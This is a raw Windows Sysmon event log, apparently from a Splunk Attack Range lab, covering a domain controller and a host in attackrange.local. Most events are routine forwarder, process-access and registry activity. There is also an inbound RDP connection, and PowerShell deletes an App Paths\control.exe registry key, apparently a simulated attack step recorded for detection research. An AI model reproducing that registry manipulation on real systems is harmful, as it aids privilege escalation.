10341000x80000000000000001055096Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:54.191{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055095Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:54.191{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055094Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:54.191{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F896-60EB-067E-00000000CF01}1196C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055093Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:54.191{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F896-60EB-067E-00000000CF01}1196C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055092Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:54.186{466BC892-F896-60EB-067E-00000000CF01}1196C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001055108Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:55.625{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC30611FB985E140A56797DFFCA283B0,SHA256=529C868590A20EB4137CC865729D09CE83949E93EF79D57778349B824D444092,IMPHASH=00000000000000000000000000000000falsetrue 
354300x8000000000000000810589Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:54.196{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57478-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810588Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:55.572{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94A07BD663CAF1A45412FB7F6676792D,SHA256=0367CA19A3E86DC249A7233E93C06CCD217B88B34BAC3E4FDBFD2954ADD288DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055107Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:55.239{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8C9080EF0D9944730F4E6C39619FA554,SHA256=FBF509BD19E67ACB6AFA76AB6DE8AE5263E9840736C8613A4F2874C06B79B9B1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055110Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:47.663{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61986-false10.0.1.12-8000- 23542300x80000000000000001055109Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:56.639{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BB2948E50AA2E5A1B21A275DB4919CD,SHA256=1A422E4018C757B6E738ECA3CCA5F685B1CBFE13562BD0232EB3029694F40477,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810590Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:56.619{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43EB39DA8F4160F7F7D4A885F0558DA6,SHA256=D08219BC2138093AC7E6EAB11B81DE8C30EF066B350EAEE4A4B230185D8B8A45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810591Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:57.635{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69DF74F4B65DD01E84BCABA0EB664E41,SHA256=C2087F59542F68232C377F789967628944615F0053D81CE14FE8E1B6438EDC90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055112Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:57.640{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AC8197BB097E044EEC83D319071D9E4,SHA256=D36A17B74816AA617FD683E818AFCAC1138057627D1DC34013FC09272B779307,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055111Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:57.425{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810592Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:58.650{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D57DB42C97DEF2073CB746AB32F215CD,SHA256=15C6E15C12BF1C48D005C8345681FFDA0AAA583BD73C0B5F406ABED9DFF1AF28,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055115Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:50.909{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61987-false10.0.1.12-8089- 23542300x80000000000000001055114Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:58.655{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4E42725E3F6031426C1AB0B15CC61F9,SHA256=D2ACD8D37963A591D4556B32C1BD21720AE00FA1E58C8BCD77D478384FEC1113,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055113Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:58.255{466BC892-5A42-60E8-C510-00000000CF01}7816ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exeC:\Users\bob\AppData\Local\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\7816.xml~RFf78980c.TMPMD5=4553D3891EC8198EC956E59A7FA89664,SHA256=7DA31B28073EC76DCCA7EDFC3709014058FE36DCB6626D30538493EE344D57A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810593Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:59.728{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=591DD77F11D211553F533DCCF638DF06,SHA256=01867DE59A06DC36D9BF8E43C811DB07DD14059F7F73B0FBBBFAF1805CD00B5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055126Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:59.669{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02E8B81601664D7288C0553671A76015,SHA256=73C7A76AC4B2928FC30E8FCD0C02E6A5C7EE49DB238F98C4D8B328136FEAB3C1,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001055125Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:08:59.669{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000001055124Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 
08:08:59.669{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f789d9a) 13241300x80000000000000001055123Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:08:59.669{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776ec-0xc909f9ec) 13241300x80000000000000001055122Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:08:59.669{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f5-0x2ace61ec) 13241300x80000000000000001055121Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:08:59.669{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fd-0x8c92c9ec) 13241300x80000000000000001055120Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:08:59.669{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000001055119Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:08:59.669{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f789d9a) 13241300x80000000000000001055118Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 
08:08:59.669{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776ec-0xc909f9ec) 13241300x80000000000000001055117Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:08:59.669{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f5-0x2ace61ec) 13241300x80000000000000001055116Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:08:59.669{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fd-0x8c92c9ec) 10341000x80000000000000001055132Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:00.753{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e
4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001055131Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:00.753{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001055130Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:00.753{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f 10341000x80000000000000001055129Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:00.753{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 23542300x80000000000000001055128Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:00.753{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFf78a1d0.TMPMD5=FEEDDF0B48ACBAE2DF2C13E094BA61E1,SHA256=564E4AC53FEF38F8EC2ADC3773CA3AE2E546D9CF626CDED40CA8B8DCCA4D789B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055127Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:00.690{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7BE9B3A2C60D8A6760A9419D335365B,SHA256=EB83888B5467BFD94E37C49342C488D143E149BF7477F6E67C80EF0A0FA8887A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810595Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:00.791{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3419CC5C698C0CDB24B65648770D1100,SHA256=6E98BCF3532D2087E27C3DC7C4B7D06E2A34A56B5E8336C6FC018C7799CBB190,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810594Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:59.330{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57479-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810596Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:01.807{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D112873A7BD64D2EF21B2E54C1D9597,SHA256=29C41CDC4BED8124BD80B9A271B956FBB104FF4090CE7D6FB81446FB753CEF1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055137Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:01.710{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DE3A1CB27FD48ADEAC28F2C1D19527B,SHA256=91B7F530642A59FC641E481C0918527B8E4A7728ABC0D343B31D3E7D6A586928,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055136Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:53.864{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-64445-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 354300x80000000000000001055135Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:53.662{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61988-false10.0.1.12-8000- 23542300x80000000000000001055134Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:01.642{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EEAB2E5EDCF0EB0B2069AAF17079EEC3,SHA256=037DB6BFE7607BE899B5FCD090D997095278753904E7E648530F2385CF1750E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055133Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:01.642{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=80C0CC2E70230EAC6FD79A8CE9BFD900,SHA256=11823BE38E550300BD1BD61EB089EA7707F525A5299395B9BE045BD30EAA86B0,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000810597Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:02.838{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B2E172C4D65F53FE0F159F945DEFCA3,SHA256=07EE48DAD43CEF0D2E3DF3D9A76B3F730E79CB62B4D0BF217E51428DE0A06224,IMPHASH=00000000000000000000000000000000falsetrue 12241200x80000000000000001055186Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteKey2021-07-12 08:09:02.973{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\control.exe 10341000x80000000000000001055185Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 